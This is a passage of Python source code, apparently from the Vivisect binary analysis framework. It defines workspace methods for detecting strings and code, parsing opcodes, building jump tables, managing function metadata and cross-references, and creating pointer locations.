fmod = self.fmods.get(fmname)
try:
fmod.analyzeFunction(self, fva)
except Exception as e:
self.vprint("Function Analysis Exception for function 0x%x, module: %s" % (fva, fmod.__name__))
self.vprint("Exception Traceback: %s" % traceback.format_exc())
self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc())
def getStats(self):
stats = {
'functions': len(self.funcmeta),
'relocations': len(self.relocations),
}
return stats
def printDiscoveredStats(self):
(disc,
undisc,
numXrefs,
numLocs,
numFuncs,
numBlocks,
numOps,
numUnis,
numStrings,
numNumbers,
numPointers,
numVtables) = self.getDiscoveredInfo()
percentage = disc*100.0/(disc+undisc) if disc or undisc else 0
self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (percentage, disc, disc+undisc))
self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs))
self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables))
def getDiscoveredInfo(self):
"""
Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps.
"""
disc = 0
undisc = 0
for mva, msz, mperms, mname in self.getMemoryMaps():
if not self.isExecutable(mva):
continue
off = 0
while off < msz:
loc = self.getLocation(mva+off)
if loc is None:
off += 1
undisc += 1
else:
off += loc[L_SIZE]
disc += loc[L_SIZE]
numXrefs = len(self.getXrefs())
numLocs = len(self.getLocations())
numFuncs = len(self.getFunctions())
numBlocks = len(self.getCodeBlocks())
numOps = len(self.getLocations(LOC_OP))
numUnis = len(self.getLocations(LOC_UNI))
numStrings = len(self.getLocations(LOC_STRING))
numNumbers = len(self.getLocations(LOC_NUMBER))
numPointers = len(self.getLocations(LOC_POINTER))
numVtables = len(self.getLocations(LOC_VFTABLE))
return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables
def getImports(self):
"""
Return a list of imports, including delay imports, in location tuple format.
"""
return list(self.getLocations(LOC_IMPORT))
def makeImport(self, va, libname, impname):
"""
Add an import entry.
"""
if libname != '*':
libname = self.normFileName(libname)
tinfo = "%s.%s" % (libname, impname)
self.makeName(va, "%s_%.8x" % (tinfo, va))
return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo)
def getExports(self):
"""
Return a list of exports in (va,etype,name,filename) tuples.
"""
return list(self.exports)
def addExport(self, va, etype, name, filename, makeuniq=False):
"""
Add an already created export object.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
"""
rname = "%s.%s" % (filename,name)
# check if it exists and is *not* what we're trying to make it
curval = self.vaByName(rname)
if curval is not None and curval != va and not makeuniq:
# if we don't force it to make a uniq name, bail
raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval))
rname = self.makeName(va, rname, makeuniq=makeuniq)
self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename))
def getExport(self, va):
"""
Get a reference to the export object at the given va
(or none).
"""
return self.exports_by_va.get(va)
def findPointers(self, cache=True):
"""
Search through all currently "undefined" space and see
if you can find pointers there... Returns a list of tuples
where the tuple is (<ptr at>,<pts to>).
"""
align = self.arch.archGetPointerAlignment()
if cache:
ret = self.getTransMeta('findPointers')
if ret is not None:
# Filter locations added since last run...
ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)]
self.setTransMeta('findPointers', ret)
return ret
ret = []
size = self.psize
for mva, msize, mperm, mname in self.getMemoryMaps():
offset, bytes = self.getByteDef(mva)
maxsize = len(bytes) - size
# if our memory map is not starting off aligned appropriately
if offset % align:
offset &= -align
offset += align
while offset + size < maxsize:
va = mva + offset
loctup = self.getLocation(va)
if loctup is not None:
offset += loctup[L_SIZE]
if offset % align:
offset += align
offset &= -align
continue
x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
if self.isValidPointer(x):
ret.append((va, x))
offset += size
continue
offset += align
offset &= -align
if cache:
self.setTransMeta('findPointers', ret)
return ret
def detectString(self, va):
'''
If the address appears to be the start of a string, then
return the string length in bytes, else return -1.
'''
plen = 0 # pascal string length
dlen = 0 # delphi string length
left = self.getMemoryMap(va-4)
# DEV: Make sure there's space left in the map
if self.isReadable(va-4) and left and (left[MAP_VA] + left[MAP_SIZE] - va + 4) >= 4:
plen = self.readMemValue(va - 2, 2) # pascal string length
dlen = self.readMemValue(va - 4, 4) # delphi string length
offset, bytez = self.getByteDef(va)
maxlen = len(bytez) - offset
count = 0
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if count > 0:
loc = self.getLocation(va+count)
if loc is not None:
if loc[L_LTYPE] == LOC_STRING:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytez[offset+count] != 0:
# we probably hit a case where the string at the lower va is
# technically the start of the full string, but the binary does
# some optimizations and just ref's inside the full string to save
# some space
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c = bytez[offset+count]
# The "strings" algo basically says 4 or more...
if c == 0 and count >= 4:
return count
elif c == 0 and (count == dlen or count == plen):
return count
if chr(c) not in string.printable:
return -1
count += 1
return -1
def isProbablyString(self, va):
if self.detectString(va) > 0 :
return True
return False
def detectUnicode(self, va):
'''
If the address appears to be the start of a unicode string, then
return the string length in bytes, else return -1.
This will return true if the memory location is likely
*simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>).
'''
# FIXME this does not detect Unicode...
offset, bytes = self.getByteDef(va)
maxlen = len(bytes) - offset
count = 0
if maxlen < 2:
return -1
charset = bytes[offset + 1]
while count < maxlen:
# If we hit another thing, then probably not.
# Ignore when count==0 so detection can check something
# already set as a location.
if (count > 0):
loc = self.getLocation(va+count)
if loc:
if loc[L_LTYPE] == LOC_UNI:
if loc[L_VA] == va:
return loc[L_SIZE]
if bytes[offset+count] != 0:
# same thing as in the string case, a binary can ref into a string
# only part of the full string.
return count + loc[L_SIZE]
return loc[L_VA] - (va + count) + loc[L_SIZE]
return -1
c0 = bytes[offset+count]
if offset + count+1 >= len(bytes):
return -1
c1 = bytes[offset+count+1]
# If we find our null terminator after more
# than 4 chars, we're probably a real string
if c0 == 0:
if count > 8:
return count
return -1
# If the first byte char isn't printable, then
# we're probably not a real "simple" ascii string
if chr(c0) not in string.printable:
return -1
# If it's not null,char,null,char then it's
# not simple unicode...
if c1 != charset:
return -1
count += 2
return -1
def isProbablyUnicode(self, va):
if self.detectUnicode(va) > 0 :
return True
return False
def isProbablyCode(self, va, **kwargs):
"""
Most of the time, absolute pointers which point to code
point to the function entry, so test it for the sig.
"""
if not self.isExecutable(va):
return False
ret = self.isFunctionSignature(va)
if ret:
return ret
rerun = kwargs.pop('rerun', False)
if va in self.iscode and not rerun:
return self.iscode[va]
self.iscode[va] = True
# because we're doing partial emulation, demote some of the logging
# messages to low priority.
kwargs['loglevel'] = e_common.EMULOG
emu = self.getEmulator(**kwargs)
wat = v_emucode.watcher(self, va)
emu.setEmulationMonitor(wat)
try:
emu.runFunction(va, maxhit=1)
except Exception as e:
self.iscode[va] = False
return False
if wat.looksgood():
self.iscode[va] = True
else:
self.iscode[va] = False
return self.iscode[va]
#################################################################
#
# Opcode API
#
def parseOpcode(self, va, arch=envi.ARCH_DEFAULT, skipcache=False):
'''
Parse an opcode from the specified virtual address.
Example: op = m.parseOpcode(0x7c773803, skipcache=True)
Set skipcache=True in order to bypass the opcode cache and force a reparsing of bytes
'''
off, b = self.getByteDef(va)
if arch == envi.ARCH_DEFAULT:
loctup = self.getLocation(va)
# XXX - in the case where we've set a location on what should be an
# opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param
# so that at least parse opcode wont fail
if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP:
arch = loctup[L_TINFO]
if not skipcache:
key = (va, arch, b[:16])
valu = self._op_cache.get(key, None)
if not valu:
valu = self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
self._op_cache[key] = valu
return valu
return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va)
def clearOpcache(self):
'''
Remove all elements from the opcode cache
'''
self._op_cache.clear()
def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False):
if not step:
step = self.psize
fname = self.getMemoryMap(startva)
if fname is None:
return
fname = fname[3]
imgbase = self.getFileMeta(fname, 'imagebase')
iters = 0
ptrbase = startva
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
while self.isValidPointer(rdest) and self.isProbablyCode(rdest):
if self.analyzePointer(ptrbase) in STOP_LOCS:
break
yield rdest
ptrbase += step
if len(self.getXrefsTo(ptrbase)):
break
rdest = self.readMemValue(ptrbase, step)
if rebase and rdest < imgbase:
rdest += imgbase
iters += 1
if maxiters is not None and iters >= maxiters:
break
def moveCodeBlock(self, cbva, newfva):
cb = self.getCodeBlock(cbva)
if cb is None:
return
if cb[CB_FUNCVA] == newfva:
return
self.delCodeBlock(cb)
self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva))
def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4):
'''
So we have the case where if we have two jump tables laid out consecutively in memory (let's
call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to
recognize Foo as being a giant table, with all of Bar overlapping with Foo
So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr
newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from
the list of references that prevRefVa refs to (and delete the name)
We also need to check to see if the functions themselves line up (ie, do these two jump tables
even belong to the same function, or should we remove the code block from the function entirely?)
'''
# Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are
# even in the same function
codeblocks = set()
curfva = self.getFunction(callingVa)
# collect all the entries for the new jump table
for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize):
if cb in codeblocks:
continue
codeblocks.add(cb)
prevcb = self.getCodeBlock(cb)
if prevcb is None:
continue
# we may also have to break these codeblocks from the old function
# 1 -- new func is none, old func is none
# * can't happen. if the codeblock is defined, we at least have an old function
# 2 -- new func is not none, old func is none
# * Can't happen. see above
# 3 -- new func is none, old func is not none
# * delete the codeblock. we've dropped into a new function that is different from the old
# since how codeflow discover functions, we should have all the code blocks for function
# 4 -- neither are none
# * moveCodeBlock -- that func will handle whether or not functions are the same
if curfva is not None:
self.moveCodeBlock(cb, curcb[CB_FUNCVA])
else:
self.delCodeBlock(prevcb[CB_VA])
# now delete those entries from the previous jump table
oldrefs = self.getXrefsFrom(prevRefVa)
todel = [xref for xref in self.getXrefsFrom(prevRefVa) if xref[1] in codeblocks]
for va in todel:
self.setComment(va[1], None)
self.delXref(va)
def makeJumpTable(self, op, tova, rebase=False, psize=4):
fname = self.getMemoryMap(tova)[3]
imgbase = self.getFileMeta(fname, 'imagebase')
ptrbase = tova
rdest = self.readMemValue(ptrbase, psize)
if rebase and rdest < imgbase:
rdest += imgbase
# if there's already an Xref to this address from another jump table, we overshot
# the other table, and need to cut that one short, delete its Xrefs starting at this one
# and then let the rest of this function build the new jump table
# This jump table also may not be in the same function as the other jump table, so we need
# to remove those codeblocks (and child codeblocks) from this function
# at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him
# (but skipping over the current jumptable base address we're looking at)
for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest):
if tova == xrfrom:
continue
refva, refsize, reftype, refinfo = self.getLocation(xrfrom)
if reftype != LOC_OP:
continue
# If we've already constructed this opcode location and made the xref to the new codeblock,
# that should mean we've already made the jump table, so there should be no need to split this
# jump table.
if refva == op.va:
continue
refop = self.parseOpcode(refva)
for refbase, refbflags in refop.getBranches():
if refbflags & envi.BR_TABLE:
self.splitJumpTable(op.va, refva, tova, psize=psize)
tabdone = {}
for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)):
if not tabdone.get(rdest):
tabdone[rdest] = True
self.addXref(op.va, rdest, REF_CODE, envi.BR_COND)
if self.getName(rdest) is None:
self.makeName(rdest, "case%d_%.8x" % (i, op.va))
else:
cmnt = self.getComment(rdest)
if cmnt is None:
self.setComment(rdest, "Other Case(s): %d" % i)
else:
cmnt += ", %d" % i
self.setComment(rdest, cmnt)
# This must be second (len(xrefsto))
self.addXref(op.va, tova, REF_PTR)
def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT):
"""
Create a single opcode location. If you have already parsed the
opcode object, you may pass it in.
"""
if op is None:
try:
op = self.parseOpcode(va, arch=arch)
except envi.InvalidInstruction as msg:
# FIXME something is just not right about this...
bytez = self.readMemory(va, 16)
logger.warning("Invalid Instruct Attempt At:", hex(va), binascii.hexlify(bytez))
raise InvalidLocation(va, msg)
except Exception as msg:
raise InvalidLocation(va, msg)
# Add our opcode location first (op flags become ldata)
loc = self.addLocation(va, op.size, LOC_OP, op.iflags)
# This takes care of all normal indirect immediates
brdone = {}
brlist = op.getBranches()
for tova, bflags in brlist:
# If there were unresolved dynamic branches, oh well...
if tova is None:
continue
if not self.isValidPointer(tova):
continue
brdone[tova] = True
# Special case, if it's a table branch, lets resolve it now.
if bflags & envi.BR_TABLE:
self.makeJumpTable(op, tova)
elif bflags & envi.BR_DEREF:
self.addXref(va, tova, REF_DATA)
ptrdest = None
if self.getLocation(tova) is None:
ptrdest = self.makePointer(tova, follow=False)
# If the actual dest is executable, make a code ref fixup
# which *removes* the deref flag...
# If we're an xref to something real, rip out the deref flag, but if we're
# an xref to a big fat 0, fuggedaboutit
if ptrdest and self.analyzePointer(ptrdest[0]):
self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF)
else:
self.addXref(va, tova, REF_CODE, bflags)
else:
# vivisect does NOT create REF_CODE entries for
# instruction fall through
if bflags & envi.BR_FALL:
continue
self.addXref(va, tova, REF_CODE, bflags)
# Check the instruction for static d-refs
for oidx, o in op.genRefOpers(emu=None):
# FIXME it would be nice if we could just do this one time
# in the emulation pass (or hint emulation that some have already
# been done.
# unfortunately, emulation pass only occurs for code identified
# within a marked function.
# future fix: move this all into VivCodeFlowContext.
# Does the operand touch memory ?
if o.isDeref():
ref = o.getOperAddr(op, None)
if brdone.get(ref, False):
continue
if ref is not None and self.isValidPointer(ref):
# It's a data reference. lets also check if the data is
# a pointer.
self.addXref(va, ref, REF_DATA)
# If we don't already know what type this location is,
# lets make it either a pointer or a number...
if self.getLocation(ref) is None:
self.guessDataPointer(ref, o.tsize)
else:
ref = o.getOperValue(op)
if brdone.get(ref, False):
continue
if ref is not None and type(ref) is int and self.isValidPointer(ref):
self.addXref(va, ref, REF_PTR)
return loc
def _dbgLocEntry(self, va):
"""
Display the human-happy version of a location
"""
loc = self.getLocation(va)
if loc is None:
return 'None'
lva, lsz, ltype, ltinfo = loc
ltvar = loc_lookups.get(ltype)
ltdesc = loc_type_names.get(ltype)
locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc)
return locrepr
def updateCallsFrom(self, fva, ncalls):
function = self.getFunction(fva)
prev_call = self.getFunctionMeta(function, 'CallsFrom')
newcall = set(prev_call).union(set(ncalls))
self.setFunctionMeta(function, 'CallsFrom', list(newcall))
def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None):
"""
Attempt to begin code-flow based disassembly by
starting at the given va. The va will be made into
an OpcodeLoc and refs will be walked continuing to
make code where possible.
"""
# If this is already a location, bail.
if self.isLocation(va):
return
calls_from = self.cfctx.addCodeFlow(va, arch=arch)
if fva is None:
self.setVaSetRow('CodeFragments', (va, calls_from))
else:
self.updateCallsFrom(fva, calls_from)
return calls_from
def previewCode(self, va, arch=envi.ARCH_DEFAULT):
'''
Show the repr of an instruction in the current canvas *before* making it that
'''
try:
op = self.parseOpcode(va, arch)
if op is None:
self.vprint("0x%x - None")
else:
self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op)))
except Exception:
self.vprint("0x%x - decode exception" % va)
logger.exception("preview opcode exception:")
#################################################################
#
# Function API
#
def isFunction(self, funcva):
"""
Return True if funcva is a function entry point.
"""
return self.funcmeta.get(funcva) is not None
def isFunctionThunk(self, funcva):
"""
Return True if funcva is a function thunk
"""
# TODO: could we do more here?
try:
return self.getFunctionMeta(funcva, 'Thunk') is not None
except InvalidFunction:
return False
def getFunctions(self):
"""
Return a list of the function virtual addresses
defined in the workspace.
"""
return list(self.funcmeta.keys())
def getFunction(self, va):
"""
Return the VA for this function. This will search code blocks
and check for a function va.
"""
if self.funcmeta.get(va) is not None:
return va
cbtup = self.getCodeBlock(va)
if cbtup is not None:
return cbtup[CB_FUNCVA]
return None
def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT):
"""
Do parsing for function information and add a new function doodad.
This function should probably only be called once code-flow for the
area is complete.
"""
logger.debug('makeFunction(0x%x, %r, 0x%x)', va, meta, arch)
if self.isFunction(va):
logger.debug('0x%x is already a function, skipping', va)
return
if not self.isValidPointer(va):
raise InvalidLocation(va)
loc = self.getLocation(va)
if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP:
arch = loc[L_TINFO]
realfva = self.cfctx.addEntryPoint(va, arch=arch)
if meta is not None:
for key, val in meta.items():
self.setFunctionMeta(realfva, key, val)
return realfva
def delFunction(self, funcva):
"""
Remove a function, it's code blocks and all associated meta
"""
if self.funcmeta.get(funcva) is None:
raise InvalidLocation(funcva)
self._fireEvent(VWE_DELFUNCTION, funcva)
def setFunctionArg(self, fva, idx, atype, aname):
'''
Set the name and type information for a single function arguemnt by index.
Example:
# If we were setting up main...
vw.setFunctionArg(fva, 0, 'int','argc')
vw.setFunctionArg(fva, 1, 'char **','argv')
'''
rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva)
while len(callargs) <= idx:
callargs.append( ('int','arg%d' % len(callargs)) )
callargs[idx] = (atype,aname)
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getFunctionArgs(self, fva):
'''
Returns the list of (typename,argname) tuples which define the
arguments for the specified function.
Example:
for typename,argname in vw.getFunctionArgs(fva):
print('Takes: %s %s' % (typename,argname))
'''
rettype, retname, callconv, callname, callargs = self.getFunctionApi(fva)
return list(callargs)
def getFunctionApi(self, fva):
'''
Retrieve the API definition for the given function address.
Returns: an API tuple (similar to impapi subsystem) or None
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
'''
ret = self.getFunctionMeta(fva, 'api')
if ret is not None:
return ret
defcall = self.getMeta('DefaultCall','unkcall')
return ('void', None, defcall, None, ())
def setFunctionApi(self, fva, apidef):
'''
Set a function's API definition.
NOTE: apidef is a tuple similar to the impapi subsystem
( rettype, retname, callconv, funcname, ( (argtype, argname), ...) )
Example:
apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), ))
vw.setFunctionApi(fva, apidef)
'''
self.setFunctionMeta(fva, 'api', apidef)
def getFunctionLocals(self, fva):
'''
Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which
represent the given function's local memory offsets.
'''
if not self.isFunction(fva):
raise InvalidFunction(fva)
return list(self.localsyms[fva].values())
def getFunctionLocal(self, fva, spdelta):
'''
Retrieve a function local symbol definition as a
(typename,symname) tuple or None if not found.
NOTE: If the local symbol references a LSYM_FARG, this API
will resolve the argument name/type from the function API
definition.
Example:
locsym = vw.getFunctionLocal(fva, 8)
if locsym:
symtype,symname = locsym
print('%s %s;' % (symtype,symname))
'''
locsym = self.localsyms[fva].get(spdelta)
if locsym is None:
return None
fva,spdelta,symtype,syminfo = locsym
if symtype == LSYM_NAME:
return syminfo
if symtype == LSYM_FARG:
apidef = self.getFunctionApi(fva)
if apidef is None:
return None
funcargs = apidef[-1]
if syminfo >= len(funcargs):
return None
return funcargs[syminfo]
raise Exception('Unknown Local Symbol Type: %d' % symtype)
def setFunctionLocal(self, fva, spdelta, symtype, syminfo):
'''
Assign a local symbol within a function (addressed
by delta from initial sp). For each symbol, a "symtype"
and "syminfo" field are used to specify the details.
Example:
# Setup a regular local integer
vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x'))
# Setup a link to a stack argument... (ie. i386 cdecl)
vw.setFunctionLocal(fva, 4, LSYM_FARG, 0)
# Setup amd64 style shadow space
vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0'))
'''
metaname = 'LocalSymbol:%d' % spdelta
metavalue = (fva,spdelta,symtype,syminfo)
self.setFunctionMeta(fva, metaname, metavalue)
def setFunctionMeta(self, funcva, key, value):
"""
Set meta key,value pairs that describe a particular
function (by funcva).
Example: vw.setFunctionMeta(fva, "WootKey", 10)
"""
if not self.isFunction(funcva):
raise InvalidFunction(funcva)
self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value))
def getFunctionMeta(self, funcva, key, default=None):
m = self.funcmeta.get(funcva)
if m is None:
raise InvalidFunction(funcva)
return m.get(key, default)
def getFunctionMetaDict(self, funcva):
"""
Return the entire dictionary of function metadata
for the function specified at funcva
"""
return self.funcmeta.get(funcva)
def getFunctionBlocks(self, funcva):
"""
Return the code-block objects for the given function va
"""
ret = self.codeblocks_by_funcva.get(funcva)
if ret is None:
ret = []
return ret
def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False):
"""
Inform the workspace that a given function is considered a "thunk" to another.
This allows the workspace to process argument inheritance and several other things.
Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA")
"""
self.checkNoRetApi(thname, fva)
self.setFunctionMeta(fva, "Thunk", thname)
n = self.getName(fva)
base = thname.split(".")[-1]
if addVa:
name = "%s_%.8x" % (base,fva)
else:
name = base
newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True)
api = self.getImpApi(thname)
if api:
# Set any argument names that are None
rettype,retname,callconv,callname,callargs = api
callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ]
self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs))
def getCallers(self, va):
'''
Get the va for all the callers of the given function/import.
Example:
for va in vw.getCallers( importva ):
dostuff(va)
'''
ret = []
for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE):
if rflags & envi.BR_PROC:
ret.append(fromva)
return ret
def getCallGraph(self):
'''
Retrieve a visgraph Graph object representing all known inter procedural
branches in the workspace. Each node has an ID that is the same as the
function va.
Example:
graph = vw.getCallGraph()
'''
return self._call_graph
def getFunctionGraph(self, fva):
'''
Retrieve a code-block graph for the specified virtual address.
Procedural branches (ie, calls) will not be followed during graph
construction.
'''
return viv_codegraph.FuncBlockGraph(self,fva)
def getImportCallers(self, name):
"""
Get a list of all the callers who reference the specified import
by name. (If we detect that the name is actually *in* our workspace,
return those callers too...
"""
ret = []
# If it's a local function, do that too..
fva = self.vaByName(name)
if fva is not None and self.isFunction(fva):
ret = self.getCallers(fva)
for fva in self.getFunctions():
if self.getFunctionMeta(fva, 'Thunk') == name:
ret.extend( self.getCallers( fva ) )
for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT):
if tinfo == name:
ret.extend( self.getCallers( lva ) )
return ret
#################################################################
#
# Xref API
#
def getXrefs(self, rtype=None):
"""
Return the entire list of XREF tuples for this workspace.
"""
if rtype:
return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ]
return self.xrefs
def getXrefsFrom(self, va, rtype=None):
"""
Return a list of tuples for the xrefs whose origin is the
specified va. Optionally, only return xrefs whose type
field is rtype if specified.
example:
for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141):
dostuff(tova)
"""
ret = []
xrefs = self.xrefs_by_from.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def getXrefsTo(self, va, rtype=None):
"""
Get a list of xrefs which point to the given va. Optionally,
specify an rtype to get only xrefs of that type.
"""
# FIXME make xrefs use MapLookup!
ret = []
xrefs = self.xrefs_by_to.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def addMemoryMap(self, va, perms, fname, bytes):
"""
Add a memory map to the workspace. This is the *only* way to
get memory backings into the workspace.
"""
self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes))
def delMemoryMap(self, va):
raise "OMG"
def addSegment(self, va, size, name, filename):
"""
Add a "segment" to the workspace. A segment is generally some meaningful
area inside of a memory map. For PE binaries, a segment and a memory map
are synonymous. However, some platforms (Elf) specify their memory maps
(program headers) and segments (sectons) seperately.
"""
self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename))
def getSegment(self, va):
"""
Return the tuple representation of a segment. With the
following format:
(va, size, name, filename)
"""
for seg in self.segments:
sva, ssize, sname, sfile = seg
if va >= sva and va < (sva + ssize):
return seg
return None
def getSegments(self):
"""
Return a list of segment tuples (see getSegment) for all
the segments defined in the current worksace
"""
return list(self.segments)
def addCodeBlock(self, va, size, funcva):
"""
Add a region of code which belongs to a function. Code-block boundaries
are at all logical branches and have more in common with a logical
graph view than function chunks.
"""
loc = self.getLocation( va )
if loc is None:
raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva))
def getCodeBlock(self, va):
"""
Return the codeblock which contains the given va. A "codeblock"
is a location compatable tuple: (va, size, funcva)
"""
return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
"""
Remove a code-block definition from the codeblock namespace.
"""
cb = self.getCodeBlock(va)
if cb is None:
raise Exception("Unknown Code Block: 0x%x" % va)
self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
"""
Return a list of all the codeblock objects.
"""
return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
"""
Add an xref with the specified fromva, tova, and reftype
(see REF_ macros). This will *not* trigger any analysis.
Callers are expected to do their own xref analysis (ie, makeCode() etc)
"""
# Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
ref = (fromva, tova, reftype, rflags)
if ref in self.getXrefsFrom(fromva):
return
self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags))
def delXref(self, ref):
"""
Remove the given xref. This *will* exception if the
xref doesn't already exist...
"""
if ref not in self.getXrefsFrom(ref[XR_FROM]):
raise Exception("Unknown Xref: %x %x %d" % ref)
self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
"""
Assume that a new pointer has been created. Check if it's
target has a defined location and if not, try to figure out
what's there. Will return the location type of the location
it recommends or None if a location is already there or it has
no idea.
"""
if self.getLocation(va) is not None:
return None
if self.isProbablyUnicode(va):
return LOC_UNI
elif self.isProbablyString(va):
return LOC_STRING
elif self.isProbablyCode(va):
return LOC_OP
return None
def getMeta(self, name, default=None):
return self.metadata.get(name, default)
def setMeta(self, name, value):
"""
Set a meta key,value pair for this workspace.
"""
self._fireEvent(VWE_SETMETA, (name,value))
def markDeadData(self, start, end):
"""
mark a virtual range as dead code.
"""
self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
"""
unmark a virtual range as dead code
"""
self._dead_data.remove( (start,end) )
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
"""
Return boolean indicating va is in
a dead data range.
"""
for start,end in self._dead_data:
if va >= start and va <= end:
return True
return False
def initMeta(self, name, value):
"""
Set a metakey ONLY if it is not already set. Either
way return the value of the meta key.
"""
m = self.getMeta(name)
if m is None:
self.setMeta(name, value)
m = value
return m
def getTransMeta(self, mname, default=None):
'''
Retrieve a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
return self.transmeta.get(mname,default)
def setTransMeta(self, mname, value):
'''
Store a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
self.transmeta[mname] = value
def castPointer(self, va):
"""
Return the value for a pointer in memory at
the given location. This method does NOT
create a location object or do anything other
than parse memory.
"""
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend)
def guessDataPointer(self, ref, tsize):
'''
Trust vivisect to do the right thing and make a value and a
pointer to that value
'''
# So we need the size check to avoid things like "aaaaa", maybe
# but maybe if we do something like the tsize must be either the
# target pointer size or in a set of them that the arch defines?
nloc = None
try:
if self.isProbablyUnicode(ref):
nloc = self.makeUnicode(ref)
elif self.isProbablyString(ref):
nloc = self.makeString(ref)
except e_exc.SegmentationViolation:
# Usually means val is 0 and we can just ignore this error
nloc = None
except Exception as e:
logger.warning('makeOpcode string making hit error %s', str(e))
nloc = None
if not nloc:
val = self.parseNumber(ref, tsize)
if (self.psize == tsize and self.isValidPointer(val)):
nloc = self.makePointer(ref, tova=val)
else:
nloc = self.makeNumber(ref, tsize)
return nloc
def makePointer(self, va, tova=None, follow=True):
"""
Create a new pointer location in the workspace. If you have already
parsed out the pointers value, you may specify tova to speed things
up.
"""
loctup = self.getLocation(va)
if loctup is not None:
if loctup[L_LTYPE] != LOC_POINTER or loctup[L_VA] != va:
logger.warning("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup))
return None
psize = self.psize
# Get and document the xrefs created for the new location
if tova is None:
tova = self.castPointer(va)
self.addXref(va, tova, REF_PTR)
ploc = self.addLocation(va, psize, LOC_POINTER)
if follow and self.isValidPointer(tova):
self.followPointer(tova)
return ploc
def makePad(self, va, size):
"""
A special utility for making a pad of a particular size.
"""
